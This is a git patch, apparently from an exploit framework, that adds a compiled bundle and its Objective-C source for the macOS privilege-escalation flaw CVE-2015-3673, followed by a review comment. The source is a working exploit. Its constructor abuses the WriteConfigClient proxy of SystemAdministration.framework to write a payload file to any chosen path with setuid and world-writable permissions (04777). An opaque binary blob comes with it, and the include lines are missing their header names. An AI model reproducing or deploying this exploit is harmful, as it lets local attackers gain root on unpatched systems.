From a8b56bb44af776c00634fb57ea920b663f868eaf Mon Sep 17 00:00:00 2001
From: joev
Date: Sun, 5 Jul 2015 18:24:45 -0500
Subject: [PATCH] Oops, need to include the binary files.
---
data/exploits/CVE-2015-3673/exploit.daplug | Bin 0 -> 9384 bytes
data/exploits/CVE-2015-3673/exploit.m | 31 +++++++++++++++++++++
2 files changed, 31 insertions(+)
create mode 100755 data/exploits/CVE-2015-3673/exploit.daplug
create mode 100644 data/exploits/CVE-2015-3673/exploit.m
diff --git a/data/exploits/CVE-2015-3673/exploit.daplug b/data/exploits/CVE-2015-3673/exploit.daplug new file mode 100755 index 0000000000000000000000000000000000000000..35671a51368e6072dff0e98b322d464b846a0eef GIT binary patch literal 9384 zcmeHNUu+!38K1)h97xCkiDXnN9ch9>i0mL?6qzRS**R<7Tw;UcCbX)C_1>Is$=&W{ zcMoi&sAsj2d^%Y@@c@V?O9&~Csru0JS4gdh%L7CR0S{H12dFL;NVG3CJmCJmnOS>p z&ozy&CT}tyg%wB+6CcK^DhL-=z$XX?x<)EgPvTKFbe0+nLoCaXdrg{aWioJ_PK* zhLCf2<{67uL{M_fis*{(n#TK71BCq6cs1ua+bM9{DY_EB^L;GuQJ#hdAU+;bh)tAp zQQ}39LX#=p-nPaI-v{wD=C(>S?pEZuJDEM3jaY@_Z3{}{EgZ|_#rdoo8Ft_|#|zXYm~N720A{gZ2CSS#_?`w>x{-DK8go% z2Of=MnnRrD$IqO~og5F>&LhFp=*cCn4=)FeQtNo1CkCI77xuijRBL;mBFm@j5 zDkwoxpV3@fh9fP7%Rf=}ccMIr98Cm6Suep+)q1%K|IPG2f(6y{k8``8_~!Ic=fzV$ zedNvDtLX!f$)??L2V=;GLmre8VNtx~tKRQElu~S9YTge-Wgu_Qc&0Z$Fh)ztbFO#6 z9~gBl*X);T3<(B)EM8@pxj)tvLlVKp0yE7PZmwJsquQFV%A-wN1OXuVZvzL$C2W+y6PFo$aR? z)1QsDp0NjEMenPQ@k49FLz-U%Pw8P~(i7iDgC$8x42aiAr%}df$O7=_h+*L>yNZQC1$~=l z&l9_}?{_k^!BrxSYwZ!`z5;jY*BtynYYr**Ynr`JxmT6@>ss2Q+~0-!CsH#Fq`_CU z_6s!kjWukGAo~!lMVx;^n<&;rnB<$po`&;dMx)k-(JNBA+n4^At{9E~<{KXvjnm8U zd^z99wc0NbBr0Xu#&u)qblX^}eGTQ;fE47_JbpqsFQRouGY3+u8;$pj=5)P14L{U> z#c0-EhMg3T#*l<|+|W@>iMvjZ{eIz@YSv}_9}V3XOW@)OyUeEiIMabo%` z^Gl{D3fji31tr+p76O>|@f$1)f$Q1N%Q~m#9czerqT&W((sSqLS=Dnb;rrwCOGr4+ z+MerFs4jdbg%yms-YGFZ#PFFn&)Go<;RMk76U8yREQXln32G?HQSDIG3`#?0fZu>K zwLtho%&Apoghw{xP5?ODqHP2AI3${oRry0jS(!g%VP63wwJ*CLlv0%99m&nkqac*O z(Z6@8jKPEbObXv?8e}r1_Ub~<^G~wWTsoEBb$f4XU9FXykc|Fad05j&H9eted{ekW z8&{;OT94gdM+)_CYCY{oqbdB|`mxrpYI>{w{g~GDeoYT+I-=<_n$Bw)#ZJme4LkucSp9mc)vZ}S z?qGF*p_0)toTQ*8Czz5K<)d`v_M|8ZPdJuf^_A~%tVAjGht}RQz@=x6=Vr{3NG(F5UPCe{;0(=M|XyLbrlLfNefhq$Br zhSh~;*>x{WS7jSWek_z%{Mjkt6d=U5wcAE4j-aYf72P*CES>Nah0ATadC8ZeE(eSSTf{9>5!;JB%C$f^F{x) OMbDJ3bq2k|*#7{$I&Mb* literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2015-3673/exploit.m b/data/exploits/CVE-2015-3673/exploit.m new file mode 100644 index 0000000000..dc450487ba --- /dev/null +++ b/data/exploits/CVE-2015-3673/exploit.m 
@@ -0,0 +1,31 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include
+#include
+#include
+#include
+#include
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+ void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+ if (p != NULL)
+ {
+ id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+ objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+ id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+ NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+ NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+ NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+ objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+ data,
+ outpath,
+ @{ NSFilePosixPermissions : @04777 });
+ }
+}
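Review bot: Nothing in exploit.m says what the file is for or how the checked-in exploit.daplug relates to it; the only provenance is the `// gcc -bundle …` line at the top, and a reviewer cannot confirm from this diff that the 9384-byte binary was built from this source. I would add a header comment such as `// Proof-of-concept source for CVE-2015-3673: writes the contents of the file named by PAYLOAD_IN to the path in PAYLOAD_OUT through WriteConfigClient, requesting mode 04777.` and either build the bundle from source at packaging time or record its checksum next to it. For anyone triaging this sample, the visible result of the final `createFileWithContents:path:attributes:` call is a new file requested with the setuid bit and world-writable permissions (`@04777`), which is the artefact file-integrity or endpoint rules should key on. The five `#include` lines appear here without header names, presumably lost in rendering, so confirm the committed file still builds.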